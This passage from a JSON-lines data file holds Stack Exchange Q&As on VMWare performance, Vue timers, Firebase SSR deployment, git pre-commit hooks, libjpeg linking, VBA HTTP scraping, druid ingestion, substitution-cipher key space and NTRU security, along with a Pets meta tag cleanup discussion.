verification every time before posting the content... right now i have a sample like \"first time we need the registration .. if we done once .. by clicking share button it will post the content automatically in the Facebook wall ... neither i need User confirmation .... thanks in advance .....\nComment: I suggest asking a new question, and tagging it appropriately. Do remem ber to vote up answers and accept responses, as more people will reply to your questions in future.\n","meta":{"source":"stackoverflow","title":"Android Share Text on Facebook instead of Link","dup_signals":{}},"subset":"stackexchange"} +{"text":"12.04, Slow load, VMWare Player\n\nQuestion: Everything, including booting, apt-get install, and web browser page load is snappy, but anything that requires random disk IO seems to be slow. The examples include: application launch, sudo command, etc. Any reason why this would happen?\nI am using VMWare Play 4.0.4, 128GB SDD, 20GB allotted to the virtual disk. \nSo far I tried both Hardware Acceleration Enabled\/Disabled.\nI also ran iozone test for disk IO speed, which seems to be reasonably fast.\nI do no think I need to align my disk space as it should be managed by my primary OS, Windows 7. Could it be that this is VMWare issue?\nAnswer: I had a similar problem. I noticed that my BIOS had the multithreading setting, the Intel VT directed I\/O and the Intel VT-x setting disabled. I enabled them and it was much faster. The vmplayer is not a hypervisor, so I surprised why the Intel virtualization settings should have made a difference.\nOther things I did to improve the performance (thanks to suggestions on the Ubuntu forums) were to disable any 3D acceleration and using a lighter desktop (I used Xubuntu-desktop or Xfce4)\n","meta":{"source":"askubuntu","title":"12.04, Slow load, VMWare Player","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should I use setInterval() in a watcher?\n\nQuestion: I'm changing a React app that animates a binary tree to Vue. The vertex and edge components are conditionally rendered based on the value of a <code>time<\/code> prop. The react app works by using the <code>useInterval<\/code> hook to place a delay between rendering each vertex.\nReact:\n<code>useInterval(\n() => {\n if (time >= maxTimes) setIsUpdating(false)\n setTime((time) => (animate ? Math.min(time + 1, maxTimes) : maxTimes))\n},\nisUpdating ? DELAY_IN_MS : null\n)\n<\/code>\nIn order to implement in Vue, I figured I could watch for changes to the value of <code>time<\/code> and call a <code>setInterval<\/code> that incremements <code>time<\/code> some <code>DELAY_IN_MS<\/code> later:\nVue:\n<code>watch: {\ntime() {\n setInterval(\n () => {\n if (this.time >= this.maxTimes) {\n this.isUpdating = false;\n }\n this.time = this.animate\n ? Math.min(this.time + 1, this.maxTimes)\n : this.maxTimes;\n },\n this.isUpdating ? DELAY_IN_MS : null\n );\n},\n},\n<\/code>\nThis results in very fast rendering\/animation of components, however, and changing <code>DELAY_IN_MS<\/code> doesn't achieve intended results.\nShould I use <code>setInterval<\/code> somewhere other than in a watcher?\nI realize assigning a new value to <code>time<\/code> in it's watcher might be recursive and problematic. Is that the problem?\nComment: It's unknown how it originally worked in React and so how it should in Vue. It runs recursively because you never check if `time` value has changed in a watcher. Doing this in a watcher is most likely a mistake because you create a lot of intervals and never clean them up.\nAnswer: I think that the problem is that this inside of the setInterval 'this' doesn't reference anymore to vue instance.\nTo solve this problem I'd try something like creating a const to hold the 'this' that references to vue instance.\nThe code could be like this!\n<code>watch: {\ntime() {\n const vueThis = this;\n setInterval(\n () => {\n if (vueThis.time >= vueThis.maxTimes) {\n vueThis.isUpdating = false;\n }\n vueThis.time = vueThis.animate\n ? Math.min(vueThis.time + 1, vueThis.maxTimes)\n : vueThis.maxTimes;\n },\n vueThis.isUpdating ? DELAY_IN_MS : null\n );\n},\n<\/code>\n},\nI hope that it can help you!!\nComment: Thanks but this doesn't seem to make a difference\nComment: This is an arrow. `const vueThis = this` isn't needed since ES6.\n","meta":{"source":"stackoverflow","title":"Should I use setInterval() in a watcher?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Performance issue when upgrading from HornetQ to Artemis ActiveMQ\n\nQuestion: Has anyone experienced performance degradation when upgrading from HornetQ to Active Artemis? \u00a0I'm working on a system that upgraded from HornetQ 2.4.5.Final to Artemis 2.10.0 and am seeing a performance degradation. \u00a0Beginning investigation, but so far it appears the configuration\/setup is similar between the two. \u00a0 \nComment: Please share some metrics regarding to the performance degradation, as well as configuration\/setup data, and all other relevant information related to your issue!\nComment: Do you have any further details to add for this performance issue?\nAnswer: There have been lots of performance enhancements made to ActiveMQ Artemis since the donation of the HornetQ code-base to Apache so if anything I would expect it to be faster. However, there's certainly a chance that a particular use-case could be slower, and there's always the possibility of bugs. \nIt's worth noting that HornetQ 2.4.5.Final was tagged in October 2014 (the same month & year as the donation to Apache) and ActiveMQ Artemis 2.10.0 was tagged in August 2019 which is about 5 years difference. That's a significant gap in the life of an active software project. There have been over 7,000 commits to the ActiveMQ Artemis code-base during that time.\nYou would really need to describe your use-case in detail and quantify the performance degradation for any real investigation to be done.\n","meta":{"source":"stackoverflow","title":"Performance issue when upgrading from HornetQ to Artemis ActiveMQ","dup_signals":{}},"subset":"stackexchange"} +{"text":"White-box webpage testers\n\nQuestion: I wrote a webPage and i want to localy scan all files in search of somes common vulnerabilities.\nI searched on the internet a lot and i can't find white-box tools as I thought.\nInstead of this, there are many black-box tools.\nMaybe do you know some, free or maybe commercial tools for thats type of tests ? \nAnswer: This question is rather offtopic because product recommendations are not allowed in this site.\nAt the OWASP site you have some of applications of your interest.\n","meta":{"source":"security.stackexchange","title":"White-box webpage testers","dup_signals":{}},"subset":"stackexchange"} +{"text":"Drawing the volume generated by three vectors\n\nQuestion: I have three vectors:\n<code>v1={1,0,0} v1={0,1,0} v1=1\/2{1,1,1}\n<\/code>\nI wish to show the volume constructed by these vectors.\nI know the amount of this volume is calculated by\n<code>1\/2 Dot[Cross[{1, 0, 0}, {0, 1, 0}], {1, 1, 1}]\n<\/code>\nBut I do not know how to draw this volume!!!\nAnswer: Use <code>Parallelepiped<\/code>:\n<code>v1 = {1, 0, 0};\nv2 = {0, 1, 0};\nv3 = 1\/2 {1, 1, 1};\nGraphics3D[Parallelepiped[{0, 0, 0}, {v1, v2, v3}]]\n<\/code>\nComment: Assuming you mean the aspect ratio, `Show[Graphics3D[Parallelepiped[{0, 0, 0}, {v1, v2, v3}]], BoxRatios -> 1]`.\nComment: Thank you so much. But How to show this volume in a cubic with sides equal to 1\nAnswer: To include the vectors in the drawing:\n<code>v = {{1, 0, 0}, {0, 1, 0}, 1\/2 {1, 1, 1}};\n\n\u211b = Parallelepiped[{0, 0, 0}, v];\n\nGraphics3D[{\n {Opacity[0.7], \u211b},\n {Red, Arrowheads[0.05],\n Arrow[Tube[{{0, 0, 0}, #}, 0.01]] & \/@ v}},\n Axes -> True,\n BoxRatios -> {1, 1, 1}]\n<\/code>\n\nThe volume can be calculated multiple ways\n<code>{Volume[\u211b], RegionMeasure[\u211b], Integrate[1, {x, y, z} \u2208 \u211b]}\n\n(* {1\/2, 1\/2, 1\/2} *)\n\nSameQ @@ %\n\n(* True *)\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Drawing the volume generated by three vectors","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error while deploying react based SSR app, using firebase-functions\n\nQuestion: I am trying to deploy my SSR app in Firebase originally forked from, after doing some modification in the app.\nWhich works fine when I do <code>sudo firebase serve --only functions,hosting<\/code> but throwing error when I do <code>firebase deploy<\/code>.\nThe reproducible repo has a package.json.\nI am using the public directory as my function directory as well.\nHowever, even if I am using a different function directory for my cloud functions, I see the same errors.\nFunction failed on loading user code. Error message:\n<code>Code in file index.js can't be loaded. Is there a syntax error in your code?\nDetailed stack trace: TypeError: c(...) is not a function\nat Object.<anonymous> (\/user_code\/assets\/app.server.js:1:28950)\nat Object.module.exports.n (\/user_code\/assets\/app.server.js:1:29283)\n...\nFunctions deploy had errors.\nTo continue deploying other features (such as database), run:\nfirebase deploy --except functions\nError: Functions did not deploy properly.\n<\/code>\nComment: @SubhenduKundu today you asked a [question](https:\/\/stackoverflow.com\/questions\/64074523\/how-to-make-gird-with-fixed-numbers-of-columns-and-rows-always), I successfully solved that but you deleted that post so I am requesting you to re-post the same question... _**Plz tell me if you have already solved that**_\nComment: Would next.js fix this?\nComment: @carl Stackoverflow was suggesting it was duplicate and was asking me to delete the post, that was the reason I deleted no other intention. I thought it's a bad community practice having duplicate questions. I don't mind putting it back, if that helps \nComment: https:\/\/stackoverflow.com\/questions\/52861086\/how-come-minmax0-1fr-works-for-long-elements-while-1fr-doesnt\nAnswer: It is possible, but you cannot serve static assets with cloud functions. You need a mix of firebase functions and firebase hosting. \nThe guys at Firebase already thought on this and you also have an implementation available. \nCheck the following documentation: \n\nOverview\nDynamic Content\nCode Example\nYoutube Video\n\nNote: There is a delay that you need to take into consideration when using cloud functions. \n\nWhen a new instance handles its first request, the response time suffers, which is called a cold start\n\nMore info\nAnswer: The problem is that firebase hosting only supports SPAs, which means that SSR is out of the picture, you need to run your SSR server in a different env where you can run nextJS, or if you're using a static page generator you could upload the files directly compromising on the ability to refresh the content, although, I'm sure a solution with cloud functions and gatsby is feasable.\nTl;DR: You won't get SSR out of Firebase Hosting\nComment: I am using firebase functions https:\/\/github.com\/subhendukundu\/template-react-ssr\/blob\/feature\/react-router\/firebase.json.\nI am assuming SSR is posible using functions as https:\/\/howtofirebase.com\/firebase-ssr-starter-7dde175a0dbc\nComment: are you using uglify or minification on your firebase functions? as I mentioned above, it is possible to do SSR with firebase functions, and now with a little more context, I can see that you're working on top of a boilerplate. Make sure you are using the right features for the node version(6) that firebase functions use, also, you don't need to minify or transpile backend code unless you want to go through the trouble.\nComment: I tried both minified and unminified code, same issue. Now about the node version, if the code minified I am guessing doesnt matter, does it?\n","meta":{"source":"stackoverflow","title":"Error while deploying react based SSR app, using firebase-functions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Tag cleanup - Part 1 - Proposal\n\nQuestion: \nThis proposal has been completed. The results can be found on Tag cleanup - Part 1 - Results\n\nThis is the first step in cleaning up Pets' tags. Most steps I have sufficient rep to do myself, but I would like a community discussion beforehand. Here we go:\n\nTag creation proposal - to create a tag search-and-rescue (although I am flexible to an alternate tag name).\n\nExample question - What to do if I cannot find my cat?\n\nBasic tag description - Questions about finding a lost pet, or questions about lost pets in general, such as what to do if you find one.\n\nTag burnination - to burninate the tag community-faq.\n\nReasoning - This is not a relevant tag (aka a meta tag), meaning a tag that describes the actual post, not the problem at hand.\n\nProcedure - Edit the tag out and have it destroyed by a mod or staff so it can never be used again (insert evil laugh here).\n\nTag edits\/possible renames - shelter vs rescue-organizations.\n\nProblem description - Shelters and rescue organizations are sightly different things. However, the two tags seem to have alternating use. Both tags a) have unrelated questions that should be edited out, b) poor or no tag descriptions, and c) confusion over which to use.\n\nSolutions - a) edit out unrelated questions, b) add accurate tag descriptions, and c) either keep them separate with accurate descriptions or merge tags under a new name describing both shelters and rescues.\n\nAdditional information - Users seem to go either or for the two tags. However, shelter is less used (10 questions, 5 of which don't need it) than rescue-organization tag. We need to clear up the difference between the two and edit out the irrelevant questions. If the tags overlap too much, it may be best to merge them into one tag, something like animal-welfare-groups.\n\nTag synonyms - tags that mean the same thing or overlap with a different tag.\n\ntag clothes should be made synonyms with attire. And attire should have the \"collar\" part in its description removed because of tag leashes includes collars. Also collar should be made synonyms with leashes. To clarify, there would be two separate tags out of this bunch, attire would be one, which would include clothes and then leashes would now include collar and it would be made separate from attire.\nthe tags horse, goats, cows, sheep and pig (and similar) should be synonyms of farm-animals or, if we want separate farm animal tags, the tag farm-animals should be destroyed.\ntags showing, competitions, and possibly showmanship should be merged into one.\n\nThat's all for right now! Of course, fulfill your moral duty and edit out incorrect tags in questions, and add the correct ones. If this is successful, I hope to do some more tag work.\nPlease, add your answer on your thoughts on one or all of these points. Be nice and thank you for putting in your time to this somewhat tedious work!\nAnswer: \nDogs (and sometimes rats) are trained to do search and rescue, so I'd counter propose something like lost-pet instead. It's less confusing, and more... laypersony.\n\ncommunity-faq is a bit of a special case of meta tag. It's meant for questions that are asked super often, and the goal is to build a canonical resource for similar questions. Quite a few sites have it, and it's one of those things that should be more, not less.\n\nNo strong opinions here.\n\nIt might be useful to consider in trying to merge - collars and harnesses are things that interface with pets. Leashes interface to humans. Folks often have strong preference with respect to all 3! I don't think leashes is the 'right' main synonym, but I can't think of a single simple English language option that covers all 3.\nComment: I totally agree to 1. \"Search and rescue\" is a serious job for pets that requires regular training and specialized equipment. The first associations that come to my mind are mountain rescue and bomb sniffers. \"Lost pet\" is unambiguous and easy to understand\nComment: @Nai45 Look at that: we already *have* a [tag:lost-pet]\nAnswer: Concerning 3. (shelter vs rescue-organizations):\nThe one thing that's problematic is that shelter doesn't have a tag description, but the word has different meanings:\n\nprotection against the environment and weather;\nrefuge, asylum;\na place to live that's not your own;\na place where you can adopt pets.\n\nThe meaning and interchanging use may be caused by the different ways shelters work globally. There are countries where shelters euthanize animals after a very short time for a lot of reasons (including lack of space and adoptability of the animal) and there are countries where shelters are forbidden to euthanize for any reason but to prevent suffering. There are countries where rescue organizations offer common pets for adoption and other countries where they pick up injured wildlife (or feral stray cats) and release them back into the wild after nursing them back to health.\nDepending on where you live, each tag may mean a different thing. In my country, any place where you can adopt a pet would be called a \"shelter\", regardless of whether it's run by a rescue organization or not.\nI recently learned that shelters can have very different names in different countries, like \"animal\/community health center\" or \"animal sanctuary\". If people translate those local names into English, the most probable outcome is \"shelter\", even though the type of organization might be considered a \"rescue organization\" in other countries.\n\nMy proposal is to define shelter as a synonym to rescue-organizations and to add a proper description to housing (which has 0 questions) to make it mean \"shelter from the weather\".\nComment: Just a little update: I gave [tag:shelter] a proper description. Please have a look and see if it's easy to understand and as unambiguous as possible.\nComment: Nobody actually got notified about your comment, I found it right now by pure accident, I think it is better posted in some place with more traffic, I will copy it to litter box.\nComment: @Elmy Thanks so much! Very helpful.\n","meta":{"source":"pets.meta.stackexchange","title":"Tag cleanup - Part 1 - Proposal","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to feed RCA video into Iphone\/Ipad?\n\nQuestion: I am not an electrical engineer. How does one go about encoding rca video feed into an line-in \/ headphone jack so an app can decode and display the video? Is there another way tru the 30 pin or lighting connector? \nOther post here similar \nAnswer: So after long hours of investigation I think the best option is to get USB capture device and plug it in to a Source machine then just use http:\/\/skjm.com\/icam\/ to see the video. \nOne could use a live steaming Wifi devices like ones of these\nhttp:\/\/www.amazon.com\/Hauppauge-Broadway-HD-Streaming-Computers-Smartphones\/dp\/B005LMWPNM\n","meta":{"source":"stackoverflow","title":"How to feed RCA video into Iphone\/Ipad?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Git commit with pre-commit hook, why it get different results?\n\nQuestion: I have a pre-commit hook to run a python script that will modify the staged files and re-add those files with <code>git add .<\/code> at the end of the script.\nThe pre-commit look like this:\n<code>#!\/bin\/sh\npython2.7 .git\/hooks\/editfile.py\n<\/code>\nThe python script look like this:\n<code>import os\nimport mmap\nimport sys\nimport subprocess\n\ndef getmodifiedfiles():\n files = []\n args = ['git', 'diff', 'HEAD', '--name-only', '-r', '--diff-filter=M']\n with open(os.devnull, 'w') as b:\n files = subprocess.check_output(args, stderr=b).splitlines()\n\n files = [i for i in files if os.path.isfile(i)]\n return files\n\ndef updaterevision(line):\n strVer = line.split(\"$Revision: \")[1].split()[0]\n version = [x for x in strVer.split('.')]\n ver = [int(i) for i in version]\n\n if ver[1] == 99:\n ver[0] += 1\n ver[1] = 0\n else:\n ver[1] += 1\n\n strVer = \"%d.%02d\" % (ver[0], ver[1])\n return str.replace(line, line.split(\"$Revision: \")[1].split()[0], strVer)\n\ndef main(args):\n filelist = getmodifiedfiles() \n \n for file in filelist :\n lines = open(file).readlines()\n\n i = 0\n for line in lines:\n if '$Revision:' in line:\n lines[idx] = updaterevision(line)\n \n i += 1\n\n with open(file, 'w') as r:\n r.writelines(lines) \n\n args = ['git', 'add', '.']\n subprocess.call(args)\n \nif __name__ == '__main__':\n main(sys.argv)\n<\/code>\nIt works as expected with <code>git commit -m \"msg\"<\/code> command, when git status I got the following result:\n<code>On branch master\nYour branch is ahead of 'origin\/master' by 1 commit.\n\nnothing to commit (working directory clean)\n<\/code>\nBut if commit using <code>git commit <filename><\/code> or <code>git commit -m \"msg\" <filename><\/code>, I got the following result which I don't want:\n<code>On branch master\nChanges to be committed:\n (use \"git reset HEAD <file>...\" to unstage)\n\n modified: filename.py\n\nChanges not staged for commit:\n (use \"git add <file>...\" to update what will be committed)\n (use \"git checkout -- <file>...\" to discard changes in working directory)\n\n modified: filename.py\n<\/code>\nWhat are the different? I don't want to fix user to only use the first command to commit. Any ideas?\nComment: Can you provide your hook script? It matters a lot.\nComment: Going off of what @iBug said, could you provide the full script?\nComment: I'm hesitant to just close this as a duplicate, but see [this question](https:\/\/stackoverflow.com\/q\/65639403\/1256452).\nAnswer: Unfortunately, with your file-rewriting pre-commit hook, the only thing you can do is to stay away from <code>git commit <files...><\/code> and only use <code>git-add<\/code>-then-<code>git-commit<\/code>.\nThat said, you're not completely out of hope. Since your hook script is intended for rewriting files (setting \"version information\"), using filters is a better idea.\nCheck this answer out: https:\/\/stackoverflow.com\/a\/17360528\/5958455\nBasically you set your script as a \"clean filter\" so it gets applied whenever a matching file is staged. This luckily includes your use case of <code>git commit <file...><\/code>.\nComment: I tried git config --global filter.updateHeader.clean editfile.py, then I got this error: cannot fork to run external filter 'editfile.py' and external filter 'editfile.py' failed. Where should I place the editfile.py?\nComment: @hexacool The path should be relative to the \"project root\", i.e. where the `.git` directory is. If you're unsure, use absolute path.\nComment: I placed the script file at the project root it doesn't work. Tried absolute path, it show fatal: cannot exec: \/home\/username\/projectname\/editfile.py' :Permission denied when run the script.\nComment: @hexacool Apparently you forgot `chmod 755` or similar.\n","meta":{"source":"stackoverflow","title":"Git commit with pre-commit hook, why it get different results?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Undefined reference to jpeg_CreateDecompress() error when using libjpeg\n\nQuestion: I install libjpeg-dev and all files are in the include folder \n<code>\/usr\/include\/jerror.h\n\/usr\/include\/jmorecfg.h\n\/usr\/include\/jpegint.h\n\/usr\/include\/jpeglib.h\n\/usr\/include\/turbojpeg.h\n\/usr\/include\/x86_64-linux-gnu\n\/usr\/include\/x86_64-linux-gnu\/jconfig.h\n<\/code>\nAnd when I try this simple code to decompress a jpeg image I got the error as in title.\nhere is the code:\n<code>#include <stdlib.h>\n#include <stdio.h>\n#include <jpeglib.h>\nint main(void){\n struct jpeg_decompress_struct cinfo;\n struct jpeg_error_mgr jerr;\n cinfo.err = jpeg_std_error(&jerr);\n jpeg_create_decompress(&cinfo);\n\n return 0;\n}\n<\/code>\nAnswer: The same problem has buged me for about two days!\nmy solution is use:\n<code>gcc your_code.c -ljpeg\n<\/code>\ninstead of:\n<code>gcc -ljpeg your_code.c\n<\/code>\nto compile your code.\nhere is the explanation:Why does the order in which libraries are linked sometimes cause errors in GCC?\nhope this will help.\nAnswer: That sounds like a linking error.\nYou are probably not linking to the library code; just including the header is not enough, that's not how C works.\nAdd something like <code>-ljpeg<\/code> last on your command line.\nComment: i used this version libjpeg-turbo8-dev\n","meta":{"source":"stackoverflow","title":"Undefined reference to jpeg_CreateDecompress() error when using libjpeg","dup_signals":{}},"subset":"stackexchange"} +{"text":"The script works well when I use MSXML2.XMLHTTP.6.0, but it fails miserably when I switch to\u00a0MSXML2.serverXMLHTTP.6.0\n\nQuestion: I've created a script in VBA to scrape breadcrumbs from a webpage using XML HTTP requests. The script works well when I implement the ActiveX component <code>MSXML2.XMLHTTP.6.0<\/code>, but it fails miserably when I switch to <code>MSXML2.serverXMLHTTP.6.0<\/code>.\nAs I've got a plan to use proxies within the script, it is necessary that I stick with <code>MSXML2.serverXMLHTTP.6.0<\/code>. However, the seond script doesn't work. To let you know, when I print the <code>.responseText<\/code>, I see gibberish content within it, as in the following:\n<code>??GN?!v:h??_??Og<]?????X ?6??'o??F??6 ?uh????x?r???????sP??????????[B??k????]??????yC????'???L???????,*?Z????? ?vX ?c?q\\t?j??????K?|???P 7??k?y?<;?>????a?*P1????w???[?T?\/f?? ?7?gn??V<E?Z??6t:??1??????E'v?1?? ?w??+??????-aD????wy?<\/code>.\nUsing <code>MSXML2.XMLHTTP.6.0<\/code> (works flawlessly):\n<code>Option Explicit\nSub GrabInfo()\n Const Url$ = \"https:\/\/www.amazon.com\/gp\/product\/B00FQT4LX2?th=1\"\n Dim oHttp As Object, Html As HTMLDocument, breadCrumbs$\n\n Set Html = New HTMLDocument\n Set oHttp = CreateObject(\"MSXML2.XMLHTTP.6.0\")\n\n With oHttp\n .Open \"GET\", Url, True\n .setRequestHeader \"User-Agent\", \"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/88.0.4324.150 Safari\/537.36\"\n .send\n While .readyState < 4: DoEvents: Wend\n MsgBox \"Status code: \" & .Status\n Html.body.innerHTML = .responseText\n breadCrumbs = Html.querySelector(\"#wayfinding-breadcrumbs_feature_div\")\n MsgBox breadCrumbs\n End With\nEnd Sub\n<\/code>\nUsing <code>MSXML2.serverXMLHTTP.6.0<\/code> (throwing an error showing <code>Object Variable or With block variable not set<\/code>):\n<code>Option Explicit\nSub GrabInfo()\n Const Url$ = \"https:\/\/www.amazon.com\/gp\/product\/B00FQT4LX2?th=1\"\n Dim oHttp As Object, Html As HTMLDocument, breadCrumbs$\n\n Set Html = New HTMLDocument\n Set oHttp = CreateObject(\"MSXML2.serverXMLHTTP.6.0\")\n\n With oHttp\n .Open \"GET\", Url, True\n .setRequestHeader \"User-Agent\", \"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/88.0.4324.150 Safari\/537.36\"\n .send\n While .readyState < 4: DoEvents: Wend\n MsgBox \"Status code: \" & .Status\n Html.body.innerHTML = .responseText\n breadCrumbs = Html.querySelector(\"#wayfinding-breadcrumbs_feature_div\")\n MsgBox breadCrumbs\n End With\nEnd Sub\n<\/code>\n\nHow can I make the second script built on <code>MSXML2.serverXMLHTTP.6.0<\/code> work?\nComment: [Proxy issue MSXML2.ServerXmlHttp](https:\/\/stackoverflow.com\/questions\/41026800\/excel-vba-msxml2-xmlhttp-6-0-vs-msxml2-serverxmlhttp-6-0?) ?\nComment: It is not a proxy issue. Instead, I gave a reason why I wish to stick with MSXML2.serverXMLHTTP.6.0.\nComment: [Differences between XMLHTTP and ServerXMLHTTP](https:\/\/stackoverflow.com\/questions\/11605613\/differences-between-xmlhttp-and-serverxmlhttp) The return value of `.responseText` is not a literal html strings. `querySelector` can't find the element. You can check the conten after saving it as a local text file.\nComment: I've already looked into the response text to find the desired element, but there is nothing but unintelligible stuff. However, If you replace the existing URL with [this](https:\/\/www.yellowpages.com\/search?search_terms=pizza&geo_location_terms=San+Francisco%2C+CA) and the selector with `.result h2 > a.business-name`, you can see that the script is able to find the element accordingly. So, it's not always the case that querySelector can find the element in the response text returned by ServerXMLHTTP @taller.\nComment: Agree. I guess it depends on how the remote server responds to requests from `ServerXMLHTTP`.\nAnswer: I tried your code and got the same \"glibberish\" response. However, removing the statement <code>setRequestHeader<\/code> (where you set the user agent) solved that issue and the response was readable, while using a different User agent (the one suggested here) resulted in the strange response.\nNote that the result of <code>Html.querySelector<\/code> is an object, not a string and you should use\n<code>Dim breadCrumbs as Object \nSet breadCrumbs = Html.querySelector(\"#wayfinding-breadcrumbs_feature_div\")\nMsgBox breadCrumbs.innerHTML\n<\/code>\n","meta":{"source":"stackoverflow","title":"The script works well when I use MSXML2.XMLHTTP.6.0, but it fails miserably when I switch to\u00a0MSXML2.serverXMLHTTP.6.0","dup_signals":{}},"subset":"stackexchange"} +{"text":"Question on monoalphabetic substitution\n\nQuestion: \nQuestion:\n A stream of cipher operates on a data stream of 6-bit characters using a simple mono-alphabetic substitution technique. Estimate and explain the number of different substitution alphabets possible. The key is effectively the substitution alphabet, which can be expressed as a $384$-bit number (i.e. $64\u00d76$ bits).\nDiscuss the security of this system compared with DES\/3DES and a one-time pad, providing a full justification for your conclusions.\n\nThis is a past exam question which I am struggling to solve. I am not a security expert, nor intending to move in that direction as a career path. The module is part of my MSc course and has nothing to do with my career.\nAnswer (what I have so far):\nThe number of different substitution alphabets is $26!$ (factorial), assuming use of the English alphabet. It is also assumed that letters can be in any position and cannot repeat themselves.\n\nWhy is the key suddenly expressed as a $384$-bit number? I don't understand. Why $64\u00b76$? \nWe don't have $64$ characters in our alphabet...if each character within the English alphabet is represented with $6$ bit, then it should be $6\u00b726=156$ bits. Correct?\nNow I am thinking if the question says $64$, maybe the alphabet is custom (like including uppercase letters and some numbers + characters), so the number of permutations is $64!$ (factorial). Is this correct?\nWhat does this key look like (or an example of such a key)?\nI understand key substitution with a single key word. For example: \n<code>abcdefghijklmnopqrstuvwxyz<\/code>\n<code>hatredbcfgijklmnopqsuvwxyz<\/code>\nCan you help me determine what the substitution alphabet key should look like?\nI went to Wikipedia's page Six-bit character code and became even more confused. Is this link even relevant?\n\nI would appreciate examples more than answers. Thank you. If you find my question too long, please ignore the part about comparison with other encryption systems.\nComment: Yes, there are not 26 characters, but 64 \u2013 this is mentioned in the question. (This might be something like uppercase, lower case, digits and some punctuation, or simply 6-bit units without any meaning, like an encoded image file.) Your Wikipedia link shows some example on what your six-bit alphabet might represent. But this doesn't have to concern you as a cryptographer.\nAnswer: The format they are proposing for the key seems to be some sort of bit-packed array. First, with 6 bits, there are 64 possible values (0-63). Now, imagine you have replacement rules (your key) like these:\n\n0 -> 17\n1 -> 43\n2 -> 12\n...\n63 -> 8\n\nWhich means: when encrypting, replace all occurrences of the value <code>0<\/code> with <code>17<\/code>, all <code>1<\/code>s with <code>43<\/code>, etc. These values may correspond to letters, but that is not necessary at this point. As the numbers on the left side of the mapping table are sequential, an alternative form of writing this key would be $17,43,12,...,8$. This could easily be transformed into the more verbose initial version. Each number in the list takes 6 bits to represent (since it must also be $<64$), and there are 64 of them, so total bits to store the key is $64*6=384$.\nIn a way, this key size is deceiving. Key of size $l$ bits normally implies that there are $2^l$ possibilities for the key. Here, you were right to use factorials. There are only $64!\\approx 2^{296}$ possible keys. To understand why this is true, think about what happens if the key is sent, but the last 6-bit number is left off. We can figure out which one it is just by seeing which value hasn't been used yet. Even if the last two 6-bit numbers are left off, there are only two possibilities for the key ($a,b$ or $b,a$). So clearly, sending 384 bits means that we are sending more than we strictly need.\nThe 6-bit character code is just one possible way to convert these 6-bit numbers the algorithm uses into characters that are useful for humans.\n","meta":{"source":"crypto.stackexchange","title":"Question on monoalphabetic substitution","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to send data to druid using docker-druid image\n\nQuestion: I am trying to use the docker-druid image to run a druid cluster. \nI started the cluster as per the instructions in the github wiki. \n<code>docker run --rm -i -p 3000:8082 -p 3001:8081 druidio\/example-cluster\n<\/code>\nI can access the druid cluster console at 192.168.99.100:8081 as well as coordinator console at 192.168.99.100:8090 successfully. \nHowever i am unable to send any data to druid instance on this cluster using <code>tranquility<\/code>.\nI am using the Tranquility Java Example to send data to druid. In this case tranquility is used as a library and not as a server. This example program works fine and is able to send data to druid if i setup druid locally on a VM as per the instructions in Getting started guide\nhowever if i try to use the dockerized druid, no data is sent to it. Neither do i see any errors. I am configuring the address of the default docker machine in my tranquility configuration as shown below:\n<code> \"properties\" : {\n \"zookeeper.connect\" : \"192.168.99.100\",\n \"druid.discovery.curator.path\" : \"\/druid\/discovery\",\n \"druid.selectors.indexing.serviceName\" : \"druid\/overlord\",\n \"http.port\" : \"8200\",\n }\n<\/code>\nIs there any additional configuration required when using docker-druid in order to send data to it from a Java application using tranquility? \nDoes tranquility locate druid services using zookeeper which would require zookeeper ports to be opened?\nWhat am i missing here?\nAnswer: I believe you are missing port 8200 in your docker config if you add <code>-p 8200:8200<\/code> you should be good to go. For more information check out https:\/\/github.com\/implydata\/distribution-docker\n","meta":{"source":"stackoverflow","title":"Unable to send data to druid using docker-druid image","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multiple commands to run using Visual Basic\n\nQuestion: I am developing a tool on Visual Studio 2010 which has a button which executes a powershell program. But before this execution we need to change the path on cmd prompt.\n<code>cd Try & powershell C:\\Users\\Medha\\Try\\out.ps1\n<\/code>\n, this statement works fine on cmd prompt but in my VB code, both the commands are taken together and executed at once, which needs to be one by one.\nI have tried this\n<code> > Shell(\"cmd.exe \/k\" + \"cd Try & powershell C:\\Users\\Medha\\Try\\out.ps1\")\n<\/code>\nPlease suggest changes to make it work.\nAnswer: Why don't you use <code>WorkingDirectory<\/code> property\n<code>Dim myProcess As New System.Diagnostics.Process\n\/\/if it's in system directory use Environment.SystemDirectory\nmyProcess.StartInfo.WorkingDirectory = \"your\\working\\directory\"\nmyProcess.StartInfo.FileName = \"powershell.exe\"\nmyProcess.StartInfo.UseShellExecute = True\nmyProcess.Start\n<\/code>\nComment: this would change the directory too ?\nComment: by default, cmd prompt opens up with C:, that itself I change it to Try directory first and then execute the powershell code as the powershell program generates some files initially which is used later in that code itself. for that it is necessary to change the path first so that the file created in middle gets created in the Try directory and can be used further\n","meta":{"source":"stackoverflow","title":"Multiple commands to run using Visual Basic","dup_signals":{}},"subset":"stackexchange"} +{"text":"NTRU less secure than previously thought?\n\nQuestion: A new paper (https:\/\/eprint.iacr.org\/2015\/552.pdf) says:\n\nThis makes it possible to asymptotically and heuristically break the NTRU cryptosystem in subexponential time (without contradicting its security assumption).\n\nDoes this mean NTRU is less secure now? By how much?\nComment: The attack in this paper is not as efficient as existing lattice-based attacks on practical parameters, so it does not affect the concrete parameters for NTRU (see the bottom of page 2). However, it is an asymptotic improvement over previous attacks, so it may lead to concretely lower security in the future. Note also that the attack requires nearly an exponential amount of space, which can make it hard to run in reality.\nAnswer: No, this result (as it stands) is of no practical use against NTRU as typically used. To quote the paper:\n\nNote that there is a large value hidden in the o(1) term, so that our algorithm does not yield practical attacks for recommended NTRU parameters.\n\nIn addition, while it is subexponential, it's just barely so; they estimate the time as $2^{ (\\ln 2\/2+o(1))n\/ \\log \\log n}$; even if we ignore the $o(1)$ term, this grows just slightly slower than an exponential 